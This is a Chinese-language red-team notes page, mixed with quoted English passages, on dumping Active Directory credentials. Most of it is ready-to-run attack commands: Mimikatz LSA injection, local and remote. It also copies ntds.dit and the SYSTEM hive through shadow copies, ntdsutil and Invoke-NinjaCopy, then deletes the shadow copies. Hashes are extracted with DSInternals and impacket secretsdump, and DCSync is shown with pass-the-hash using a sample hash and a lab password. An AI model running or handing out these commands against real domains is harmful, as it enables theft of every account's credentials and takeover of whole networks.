Dump域内凭据汇总
How Attackers Dump Active Directory Database Credentials
读取LSASS进程内存
1. 本地获取
Mimikatz
通过与LSA Server交互直接拿到SAM和NTDS中储存的Hash, 这种方式与读取SAM,NTDS文件拿到的信息基本一致,但直接与LSASS 交互有可能造成其crash,尤其是在域很大的情况下。
1
2
3
4
privilege::debug
lsadump::lsa /inject
lsadump::lsa /inject /id:502
lsadump::lsa /inject /name:krbtgt
1
2
3
4
privilege::debug
lsadump::lsa /patch
lsadump::lsa /patch /id:502
lsadump::lsa /patch /name:krbtgt
/patch: 在memory中修改了samsrv.dll的逻辑(即patching),从而获取LM/NTLM Hash。mimikatz作者不建议用/patch,修改LSA逻辑可能代码未知风险。
/inject: 在Lsass.exe中new了一个新的thread,除LM/NTLM Hash外还可以获取WDigest and Kerberos keys,但new thread的行为也易于被发现。
注意:
sekurlsa::logonpasswords,这条命令只能dump登录过此机器的账户Hash(仅创建没有登录过也无法dump);如果能够解密出明文、会解密明文。
privilege::debug token::elevate lsadump::sam token::revert exit,这条命令是读取并解密SAM,能够获得本地所有账户的Hash。
lsadump::lsa /inject,向LSA请求SAM或AD数据;这条命令在域控机器上执行,dump的是域内所有账户、域控机器本地账户Hash;在非域控机器上执行,dump的是本地账户Hash。
Invoke-Mimikatz
1
2
Invoke-Mimikatz -Command '"LSADump::LSA /inject" exit'
Invoke-Mimikatz -Command '"LSADump::LSA /inject" exit'
发现使用Invoke-Mimikatz并不需要设置调试权限。。。
2. 远程获取
Invoke-Mimikatz
此命令以medium权限执行即可,但需要当前用户拥有域管理员权限
1
Invoke-Mimikatz -Command 'privilege::debug "lsadump::lsa /inject"' -ComputerName ringdc-pc
获取ntds.dit后离线提取Hash
EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE
How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller
The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
All data in Active Directory is stored in the file ntds.dit (by default located in C:\Windows\NTDS\) on every domain controller.
Next, with access to a domain controller’s file system, the adversary can exfiltrate ntds.dit and the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit. While running, Active Directory maintains a file system lock on the ntds.dit file, which means simply attempting to copy it will fail.
一. 获取NTDS.dit文件
**1. Volume Shadow Copy Service (VSS) **
卷影复制服务是Windows XP开始引入的服务,用于为计算机文件或特定卷创建快照(即使文件正在使用中),以便将来某一时刻将数据恢复到之前时间点。
调用Volume Shadow Copy服务会产生日志文件,位于System下,Event ID为7036
执行ntdsutil snapshot "activate instance ntds" create quit quit会额外产生Event ID为98的日志文件
1.vssadmin.exe
域环境默认安装
【管理员权限】
1
2
3
C:\Users\Administrator>vssadmin list shadows
C:\Users\Administrator>vssadmin create shadow /for=C:
C:\Users\Administrator>vssadmin list shadows
1
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\extract\ntds.dit
1
C:\Users\Administrator>reg save hklm\system c:\extract\SYSTEM_reg
1
2
3
C:\Users\Administrator>vssadmin delete shadows /Shadow={22af24c0-bcd4-46b1-aff7-dce2dc4f25f6} /quiet
C:\Users\Administrator>vssadmin delete shadows /for=c: /quiet
C:\Users\Administrator>vssadmin list shadows
2. ntdsutil.exe
域环境默认安装
查询当前系统的快照
1
2
ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit
创建快照
1
ntdsutil snapshot "activate instance ntds" create quit quit
挂载快照
1
ntdsutil snapshot "mount {6e31c0ab-c517-420b-845d-c38acbf77ab9}" quit quit
复制ntds.dit
1
copy C:\$SNAP_201802270645_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
卸载快照
1
ntdsutil snapshot "unmount {6e31c0ab-c517-420b-845d-c38acbf77ab9}" quit quit
删除快照
1
ntdsutil snapshot "delete {6e31c0ab-c517-420b-845d-c38acbf77ab9}" quit quit
更简单的,用以下命令就可以将ntds.dit和system文件拷贝到c:\temp目录下,也不需要再删除快照
1
ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp" q q
3. vshadow.exe
4. diskshadow.exe
2. PowerSploit’s Invoke-NinjaCopy
https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/
调用Volume Shadow Copy服务会产生日志文件,Invoke-NinjaCopy.ps1没有通过Windows API去读取文件(这种方式会有ACL权限、文件锁检查等),而是直接获取对存储卷的访问;再去解析NTFS文件格式,定位文件位置后读取raw bytes。
1
2
3
4
5
6
//high integrity
.\Invoke-NinjaCopy.ps1 -path c:\windows\system32\config\system -localdestination c:\test\system -verbose -computername workstationvm
VERBOSE: PowerShell ProcessID: 3196
VERBOSE: Copied 5242880 bytes. 6553600 Bytes remaining
VERBOSE: Copied 10485760 bytes. 1310720 Bytes remaining
VERBOSE: Copied 11796480 bytes. 0 Bytes remaining
二. 提取出账户Hash
1. Powershell module: DSInternals
1
2
Install-Module DSInternals
Import-Module DSInternals
1
2
// 这种方法似乎只支持注册表导出的SYSTEM, C:\Windows\System32\config\SYSTEM不支持
Get-BootKey -SystemHiveFilePath .\extract\SYSTEM_reg
1
Get-ADDBAccount -BootKey $bootkey -DatabasePath '.\extract\ntds.dit' -All | Out-File .\extract\result.txt
如果执行Get-ADDBAccount出现以下错误:
执行以下命令:
1
esentutl /p c:\extract\ntds.dit /!10240 /8 /o
2. Python: impacket
1
secretsdump.py -ntds "Desktop\temp\Active Directory\ntds.dit" -system Desktop\temp\registry\SYSTEM local
利用DCSync获取
详细原理见: DCsync原理及利用.md
impacket
1
secretsdump.py -just-dc-user krbtgt ring2/win10:Test1234@ringdc-pc
1
secretsdump.py -just-dc ring2/win10:Test1234@192.168.240.142
1
secretsdump.py -hashes :b9e0cfceaf6d077970306a2fd88a7c0a ring2.com/administrator@192.168.240.142